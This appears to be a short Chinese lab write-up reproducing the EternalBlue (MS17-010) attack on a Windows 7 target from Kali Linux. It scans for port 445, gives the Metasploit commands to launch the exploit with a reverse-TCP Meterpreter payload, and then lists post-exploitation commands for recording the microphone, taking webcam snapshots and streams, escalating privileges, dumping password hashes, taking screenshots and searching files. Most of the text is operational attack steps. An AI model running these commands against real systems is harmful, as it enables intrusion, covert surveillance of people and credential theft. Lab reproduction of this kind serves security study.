0%

永恒之蓝漏洞复现

1.实验环境:(1)win7靶机一台(2)kail linux攻击机

2.渗透前信息收集
(1)使用扫描器扫描内网打开445端口的计算机

img

3.扫描存在漏洞的Ip

img

调用永恒之蓝:use exploit/windows/smb/ms17_010_eternalblue
设置客户端IP:set rhost 10.**.**.7*
设置payload:set payload windows/x64/meterpreter/reverse_tcp
设置监听的IP:set lhost 10.*.*.*
meterspoilt常用命令:
摄像头:
ecord_mic       -->X秒从默认的麦克风record_mic音频记录(音频录制)
webcam_chat      -->开始视频聊天(视频,对方会有弹窗)
webcam_list      -->单摄像头(查看摄像头列表)
webcam_snap      -->采取快照从指定的摄像头(摄像头拍摄一张照片)
webcam_stream    -->播放视频流从指定的摄像头(开启摄像头监控)
其他:
getsystem        -->获取高权限
hashdump         -->获取当前用户hash
pwd              -->查看工作目录
screenshot       -->截屏
search -f *.doc  -->搜索文件(doc)

img